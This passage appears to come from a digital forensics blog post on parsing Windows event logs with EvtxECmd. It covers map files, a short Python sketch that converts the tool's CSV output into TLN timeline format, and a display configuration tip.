279,279,2018-03-30 21:09:16.6870673,3,4,Microsoft-Windows-Bits-Client,Microsoft-Windows-Bits-Client/Operational,3636,11240,DESKTOP-PM6C56D,S-1-5-18,,,,,,,,,,,F:\lonewolf\data\evtx\Microsoft-Windows-Bits-Client%4Operational.evtx

In the case of the EvtxECmd output, there seems to be some important information missing. Talking to Eric about this, he said that in order to get the additional details (i.e., strings, event description) in the CSV output, you need to have a map file for the event.

So, there you go.  Once the appropriate map files are in place and the event description is available as part of the output, given the header of the output file, it will be relatively easy to write a script that will translate the output of the tool into something easily incorporated directly into a timeline, for direct inclusion into an analysis process.
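To illustrate, here's one way such a translation script might look.  This is a sketch under some assumptions: the column names ("TimeCreated", "Computer", "Provider", "EventId", "PayloadData1") are taken from one version of the tool's output and should be checked against your own header row, timestamps are treated as UTC, and the description field is built from whatever fields you care about rather than the full map-driven event description:

```python
# Sketch: convert EvtxECmd CSV rows to five-field TLN format
# (time|source|system|user|description), with time as Unix epoch.
import csv
from datetime import datetime, timezone

def csv_to_tln(csv_path, out_path):
    with open(csv_path, newline="", encoding="utf-8") as f_in, \
         open(out_path, "w", encoding="utf-8") as f_out:
        for row in csv.DictReader(f_in):
            # EvtxECmd timestamps look like "2018-03-30 21:09:16.6870673";
            # trim to microsecond precision so strptime can parse them
            ts = row["TimeCreated"][:26]
            dt = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f")
            epoch = int(dt.replace(tzinfo=timezone.utc).timestamp())
            # Description: event source/ID plus one payload field
            # (column names assumed; adjust to your own output)
            desc = "%s/%s;%s" % (row["Provider"], row["EventId"],
                                 row.get("PayloadData1", ""))
            f_out.write("%d|EVTX|%s||%s\n" % (epoch, row["Computer"], desc))
```

From there, the TLN output can be fed into the same timeline process as the wevtx.bat output shown above.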

For your analysis process, Eric includes map files with the tool (read Eric's info for more detail); when I ran the tool, there were 52 map files available.  Eric also provides a description of how to create your own map files.

A note on using Eric's CLI tools: whenever I install a system, one of my first configuration steps is to modify the command prompt to a white background with black letters.  This makes things much easier for screen captures, particularly for books and presentations.  When I ran Eric's CLI tools for the first time, I got a lot of blank lines in the output, and highlighting or selecting the contents of the screen did not reveal the underlying text.  I reached out to Eric, and he said that I needed to get the nlog.config file from his site and include it in the directory with each of the command line tools.  I simply created a folder for Eric's tools, and put one copy of the file alongside all of the other tools.

Resources
Link to EvtxECmd Maps